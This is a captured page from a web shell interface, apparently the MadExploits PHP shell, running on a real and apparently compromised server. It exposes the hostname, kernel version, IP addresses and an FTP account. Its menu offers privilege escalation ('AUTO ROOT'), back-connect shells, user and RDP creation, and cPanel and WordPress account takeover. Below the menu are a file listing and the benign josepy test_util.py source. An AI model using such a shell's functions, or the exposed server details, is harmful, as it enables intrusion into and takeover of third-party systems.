Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.186
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.6 /
site-packages /
josepy /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
testdata
[ DIR ]
drwxr-xr-x
__init__.py
1.66
KB
-rw-r--r--
b64.py
1.4
KB
-rw-r--r--
b64_test.py
2.2
KB
-rw-r--r--
errors.py
762
B
-rw-r--r--
errors_test.py
463
B
-rw-r--r--
interfaces.py
7.51
KB
-rw-r--r--
interfaces_test.py
3.51
KB
-rw-r--r--
json_util.py
15.35
KB
-rw-r--r--
json_util_test.py
13.83
KB
-rw-r--r--
jwa.py
8.17
KB
-rw-r--r--
jwa_test.py
8.8
KB
-rw-r--r--
jwk.py
13.12
KB
-rw-r--r--
jwk_test.py
12.69
KB
-rw-r--r--
jws.py
13.84
KB
-rw-r--r--
jws_test.py
8.32
KB
-rw-r--r--
magic_typing.py
529
B
-rw-r--r--
magic_typing_test.py
1.05
KB
-rw-r--r--
test_util.py
2.57
KB
-rw-r--r--
util.py
8.37
KB
-rw-r--r--
util_test.py
8.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : test_util.py
"""Test utilities. .. warning:: This module is not part of the public API. """ import os import OpenSSL import pkg_resources from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import serialization from josepy import ComparableRSAKey, ComparableX509 from josepy.util import ComparableECKey def vector_path(*names): """Path to a test vector.""" return pkg_resources.resource_filename( __name__, os.path.join('testdata', *names)) def load_vector(*names): """Load contents of a test vector.""" # luckily, resource_string opens file in binary mode return pkg_resources.resource_string( __name__, os.path.join('testdata', *names)) def _guess_loader(filename, loader_pem, loader_der): _, ext = os.path.splitext(filename) if ext.lower() == '.pem': return loader_pem elif ext.lower() == '.der': return loader_der else: # pragma: no cover raise ValueError("Loader could not be recognized based on extension") def load_cert(*names): """Load certificate.""" loader = _guess_loader( names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1) return OpenSSL.crypto.load_certificate(loader, load_vector(*names)) def load_comparable_cert(*names): """Load ComparableX509 cert.""" return ComparableX509(load_cert(*names)) def load_csr(*names): """Load certificate request.""" loader = _guess_loader( names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1) return OpenSSL.crypto.load_certificate_request(loader, load_vector(*names)) def load_comparable_csr(*names): """Load ComparableX509 certificate request.""" return ComparableX509(load_csr(*names)) def load_rsa_private_key(*names): """Load RSA private key.""" loader = _guess_loader(names[-1], serialization.load_pem_private_key, serialization.load_der_private_key) return ComparableRSAKey(loader( load_vector(*names), password=None, backend=default_backend())) def load_ec_private_key(*names): """Load EC private key.""" loader = _guess_loader(names[-1], serialization.load_pem_private_key, serialization.load_der_private_key) return ComparableECKey(loader( load_vector(*names), password=None, backend=default_backend())) def load_pyopenssl_private_key(*names): """Load pyOpenSSL private key.""" loader = _guess_loader( names[-1], OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1) return OpenSSL.crypto.load_privatekey(loader, load_vector(*names))
Close